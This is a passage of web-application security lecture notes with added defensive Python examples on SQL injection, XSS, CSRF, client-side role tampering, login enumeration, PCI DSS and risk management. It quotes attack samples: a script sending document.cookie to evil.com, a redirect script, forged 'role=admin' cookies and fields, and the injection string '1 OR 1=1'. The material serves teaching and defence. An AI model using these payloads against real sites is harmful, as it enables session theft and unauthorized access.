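def list_users(conn, sort_by):
    """Identifiers cannot be bound as parameters, so whitelist them against a fixed set."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("sort column not allowed")
    return [row[0] for row in conn.execute("SELECT username FROM users ORDER BY " + sort_by)]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "alice", TAUTOLOGY))
    print("parameterized:", login_parameterized(db, "alice", TAUTOLOGY))
    print("blacklist passes numeric injection:", blacklist_ok("1 OR 1=1"))
```

With the tautology as the password, the concatenated query matches every row while the parameterized one matches none. The blacklist illustrates the slide's point that filtering characters is not enough: a value such as `1 OR 1=1` contains none of the listed characters yet changes a numeric comparison, whereas the data-type check rejects it. The ORDER BY case shows where whitelisting is the only option, because column names cannot be passed as bound parameters.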
Cross-Site Scripting (XSS)
- The attack targets the user of the system rather than the system itself
- It uses client-side languages executing within the user’s web environment with the same level of privileges as the hosted site
- Can be used to exploit a browser hole to download a Trojan/virus
- Client-side scripting languages:
-- DHTML (HTML, XHTML, HTML x.0)
-- JavaScript, Java (applets), VBScript
-- Flash, ActiveX, XML/XSL, CSS
1. Attacker injects malicious code into the vulnerable web server
2. Victim visits the vulnerable web server
3. Malicious code is served to the victim by the web server
4. Malicious code executes in the victim’s browser with the vulnerable site’s privileges
Stealing cookies via XSS
• Attacker injects a script that reads the site’s cookie
• The script sends the cookie to the attacker
• The attacker can now log into the victim’s site
<script>
var img = new Image();
img.src = "http://evil.com/log_cookie.php?" + document.cookie;
</script>
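Two server-side defences against the cookie theft shown above, as an added example that is not code from the lecture: untrusted text is HTML-escaped before it is placed in the page, so an injected script tag is displayed as text rather than executed, and the session cookie is issued with HttpOnly (plus Secure and SameSite) so that document.cookie cannot read it even when a script does run. The payload, the comment renderer and the cookie name are constructed for the example.

```python
# Added example, not from the slides: two defences against the cookie theft
# shown above. Untrusted text is HTML-escaped before it is placed in the page,
# so the injected <script> is displayed as text instead of run, and the session
# cookie is issued with HttpOnly (plus Secure and SameSite) so document.cookie
# cannot read it even if a script does run. Payload and names are constructed.
import html
import secrets
from http.cookies import SimpleCookie

# Constructed payload of the same shape as the slide's cookie-stealing script
INJECTED = ('<script>var img = new Image();'
            'img.src = "http://evil.com/log_cookie.php?" + document.cookie</script>')


def render_comment(author, text):
    """Output encoding: every untrusted value is escaped for its HTML text context."""
    return '<p class="comment"><b>%s</b>: %s</p>' % (
        html.escape(author, quote=True), html.escape(text, quote=True))


def has_live_script(rendered):
    """Crude check used here only to show no executable tag survived escaping."""
    return "<script" in rendered.lower()


def session_cookie_header(session_id=None):
    """Build the Set-Cookie line for a new session cookie with the protective attributes set."""
    session_id = session_id or secrets.token_urlsafe(32)
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True     # not readable from JavaScript (document.cookie)
    jar["session"]["secure"] = True       # never sent over plain HTTP
    jar["session"]["samesite"] = "Lax"    # not attached to most cross-site requests
    jar["session"]["path"] = "/"
    return jar.output(header="Set-Cookie:").strip()


if __name__ == "__main__":
    print(render_comment("mallory", INJECTED))
    print(session_cookie_header())
```

Escaping is context-specific: html.escape is right for element text and quoted attribute values, but data placed inside a script block, a URL or a CSS value needs the encoding for that context. HttpOnly limits what a successful injection can steal; it does not stop the script from acting on the victim's behalf while the page is open, which is why the output encoding is the primary fix.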
Redirecting the user via XSS
• Attacker injects a script that automatically redirects the victim to the attacker’s site
<script>
document.location = "http://evil.com";
</script>
Phishing via XSS
• Attacker injects a script that redirects the victim to a “familiar website” (e.g. a copy of the site of a bank)
• The fake page asks for the user’s credentials or other sensitive information
• The attacker now has everything needed to log in (and transfer money)
Privacy Violation via XSS
• The attacker’s script determines the sites the victim has visited in the past
• This information can be used for targeted phishing attacks
Cross-Site Request Forgery (CSRF)
1. Victim is logged into vulnerable web site
2. Victim visits attacker’s web site
3. Malicious content is delivered to victim
4. Victim involuntarily sends a request to the vulnerable web site
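The synchronizer-token defence for the four-step sequence above, as an added example that is not code from the lecture. The site stores a random token per session, embeds it in its own forms, and rejects any state-changing request whose token does not match; a request forged from the attacker's page carries the victim's session cookie (step 4) but cannot read the token, so it fails. The session store, the /transfer endpoint and the form fields are hypothetical.

```python
# Added example, not from the slides: the synchronizer-token defence for the
# CSRF sequence above. The site stores a random token per session, embeds it
# in its own forms, and rejects any state-changing request whose token does
# not match, so a request forged from the attacker's page (which carries the
# victim's cookie but cannot read the token) fails at step 4. Session store,
# endpoint and form fields are hypothetical.
import hmac
import secrets

# Server-side session store, constructed for the example: session id -> session data
SESSIONS = {}


def new_session(username):
    """Log a user in: create the session and its CSRF token on the server."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid):
    """The legitimate site embeds the session's token in its own form."""
    token = SESSIONS[sid]["csrf_token"]
    return ('<form method="post" action="/transfer">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="amount"><button>Send</button></form>' % token)


def handle_transfer(sid, form):
    """Server side of step 4: `sid` is the session cookie the browser attached,
    `form` the POST body. Returns (status, message)."""
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "not logged in"
    submitted = form.get("csrf_token", "")
    # Constant-time comparison; encode so non-ASCII input cannot raise
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return 403, "missing or invalid CSRF token"
    return 200, "transferred %s for %s" % (form["amount"], session["user"])


if __name__ == "__main__":
    sid = new_session("victim")
    # Forged request from the attacker's page: cookie present, token absent
    print(handle_transfer(sid, {"amount": "1000"}))
    # Genuine submission of the site's own form
    print(handle_transfer(sid, {"csrf_token": SESSIONS[sid]["csrf_token"], "amount": "10"}))
```

The token only helps if the site never performs state changes on GET requests and the token itself cannot be read cross-origin, which is why it is stored server-side and compared in constant time. A SameSite attribute on the session cookie is a complementary control, not a replacement, since older browsers ignore it.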
SQL Injection
The attacker submits an HTTP request with a malicious parameter value that modifies an existing SQL query or adds new queries
• Misconfiguration
- outdated versions of the server
- outdated versions of third party web applications
- guessable passwords (application, FTP/SSH)
- retrievable source code
• Do not rely on client-side controls that are not enforced on the server side
-- Cookie
Cookie: role=guest
Cookie: role=admin
-- Hidden form parameters
<input type="hidden" name="role" value="guest">
<input type="hidden" name="role" value="admin">
-- JavaScript checks
function validateRole() { return 1; }
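What server-side enforcement of the role looks like, as an added example that is not code from the lecture: the role is derived from the server's own session store and never from the request, so a rewritten cookie, hidden field or JavaScript check changes nothing. The session table, usernames and roles are constructed for the example.

```python
# Added example, not from the slides: the server derives the role from its own
# session store and never from the request, so the forged "role=admin" cookie,
# hidden field or a rewritten JavaScript check changes nothing. The session
# table, usernames and roles are constructed for the example.
from http.cookies import SimpleCookie

# Server-side state: session id -> username, and the authoritative role table
SESSIONS = {"sess-guest-1": "guest_user", "sess-admin-1": "root"}
ROLES = {"guest_user": "guest", "root": "admin"}


def parse_cookies(header):
    """Turn a Cookie request header into a dict of name -> value."""
    jar = SimpleCookie()
    jar.load(header or "")
    return {name: morsel.value for name, morsel in jar.items()}


def effective_role(cookie_header, form):
    """The only input consulted is the session id; a 'role' anywhere in the request is ignored."""
    user = SESSIONS.get(parse_cookies(cookie_header).get("session"))
    if user is None:
        return "anonymous"
    return ROLES.get(user, "guest")


def admin_page(cookie_header, form):
    """Server-side enforcement of the admin-only page. Returns (status, body)."""
    if effective_role(cookie_header, form) != "admin":
        return 403, "forbidden"
    return 200, "admin panel"


if __name__ == "__main__":
    # Guest who edited both the cookie and the hidden field to say admin
    print(admin_page("session=sess-guest-1; role=admin", {"role": "admin"}))
    # Real administrator session
    print(admin_page("session=sess-admin-1", {}))
```

The `form` argument is deliberately unused: the request may claim any role it likes, and the decision still comes from the mapping the server controls. Client-side checks such as validateRole() remain useful for usability, not for security.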
• Authentication Errors
- weak passwords
- brute-forceable (enforce an upper limit on the number of failures in a given time)
- verbose failure messages (“wrong password”): do not leak information
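A login routine that applies the generic-message rule from the username/password enumeration slides together with the failure limit from the list above, as an added example that is not code from the lecture. It returns one message whatever was wrong, performs the same password-hashing work for unknown and known usernames so response time does not reveal which accounts exist, and refuses further attempts on an account after too many failures in a window. The user table, the limits and the hashing parameters are assumptions for the example.

```python
# Added example, not from the slides, serving both the username/password
# enumeration slides and the authentication-errors list above: one generic
# failure message whatever was wrong, the same password-hashing work for unknown
# and known usernames so response time does not leak which exist, and a limit
# on failures per account in a time window. User table, limits and hashing
# parameters are assumptions for the example.
import hashlib
import hmac
import os
import time

GENERIC_FAILURE = "Invalid username or password"   # never "Invalid Username" / "Incorrect Password"
MAX_FAILURES = 5            # assumed upper limit on failures ...
WINDOW_SECONDS = 15 * 60    # ... within this window
ITERATIONS = 100_000        # PBKDF2 work factor, assumed


def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user table: username -> (salt, digest)
USERS = {"alice": hash_password("correct horse battery staple")}
# Dummy record so an unknown username costs the same hashing work as a real one
DUMMY = hash_password("not-a-real-password")
FAILURES = {}   # username -> timestamps of recent failures


def recent_failures(username, now):
    """Drop failures older than the window and return the ones that remain."""
    cutoff = now - WINDOW_SECONDS
    FAILURES[username] = [t for t in FAILURES.get(username, []) if t > cutoff]
    return FAILURES[username]


def login(username, password, now=None):
    """Return (ok, message); the message never says which part was wrong."""
    now = time.time() if now is None else now
    if len(recent_failures(username, now)) >= MAX_FAILURES:
        # Locked out for the rest of the window; still the generic message
        return False, GENERIC_FAILURE
    salt, expected = USERS.get(username, DUMMY)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    ok = username in USERS and hmac.compare_digest(candidate, expected)
    if not ok:
        FAILURES[username].append(now)
        return False, GENERIC_FAILURE
    FAILURES.pop(username, None)
    return True, "Welcome"


if __name__ == "__main__":
    print(login("alice", "wrong"))       # (False, 'Invalid username or password')
    print(login("nobody", "wrong"))      # same message: nothing to enumerate
    print(login("alice", "correct horse battery staple"))
```

The dummy record matters as much as the message: if unknown usernames skipped the hash, the faster response would leak the same information the wording was meant to hide. A per-account lockout is itself a lever an attacker can pull to lock users out, so deployments usually combine it with per-source rate limiting or a challenge rather than relying on it alone.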
Compliance
PCI DSS
Payment Card Industry Data Security Standard (PCI-DSS)
• A proprietary information security standard for organizations that handle branded credit cards from the major card schemes (Visa, MasterCard, American Express, Discover, JCB and China UnionPay)
• Private cards which are not part of a major card scheme are not included in the scope of PCI DSS
• It is mandated by the card brands and administered by the Payment Card Industry Security Standards Council
• Its purpose is to increase controls around cardholder data to reduce credit card fraud via its exposure
• Validation of compliance
- needs to be performed every year
- either by an external Qualified Security Assessor (QSA) that creates a Report on Compliance (ROC), for organizations handling large volumes of transactions
- or by a Self-Assessment Questionnaire (SAQ), for companies handling smaller volumes
• PCI DSS originally began as 5 different programs
- Visa’s Cardholder Information Security Program
- MasterCard’s Site Data Protection
- American Express’ Data Security Operating Policy
- Discover’s Information Security and Compliance
- JCB’s Data Security Program
• All 5 programs had the same targets
- create an additional level of protection for card issuers
- ensure merchants meet a minimum level of security when they store/process/transmit cardholder data
• PCI SSC was formed in Dec 2004 when these 5 companies released PCI DSS
• Version 1.0 (Dec 2004)
• Version 1.1 (Sep 2006) – clarifications on v1.0
• Version 1.2 (Oct 2008) – enhancements on addressing risks and threats
• Version 2.0 (Oct 2010)
• Version 3.0 (Nov 2013)
• Version 3.1 (Apr 2015) – current one
PCI DSS specifies 12 requirements for compliance, organized into 6 logically related groups called “control objectives”
PCI SSC has released several supplemental pieces of information for extra clarification:
• Information Supplement: Requirement 11.3 Penetration Testing
• Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified
• Navigating the PCI DSS: Understanding the Intent of the Requirements
• Information Supplement: PCI DSS Wireless Guidelines
• In the event of a security breach, any compromised entity which WAS NOT PCI DSS compliant at the time of the breach will be subject to additional card scheme penalties, such as fines
Risk Management Framework
Identify
- Ensure your company’s I.T. governance policies exist and are current
- Verify all key stakeholders know about them
Protect
- Know how your data flows
- Understand where it flows from and to, and how it is protected
- Check for vulnerabilities and data leakage
- Policies exist, are current and follow governance
- Seek insurance policies to help with the risk
Detect
- Detection for anomalies is in place
- Real-world testing is performed periodically
Respond
- Review action plans associated with the event of a breach
- Are skilled personnel on hand in the event of a breach?
Recover
- Establish a recovery plan to implement after a breach
- Prepare communication of the recovery to the internal and external parties affected
Conclusions
• No business is immune from a data breach
• Security is a boardroom issue
• Many executives don’t understand their organization’s information data flow and/or how it is being protected
• Threats come in all sorts of shapes and sizes
• Insider misuse leads to inadvertent data leakage and breaches
• The threat is not only technical: educate your employees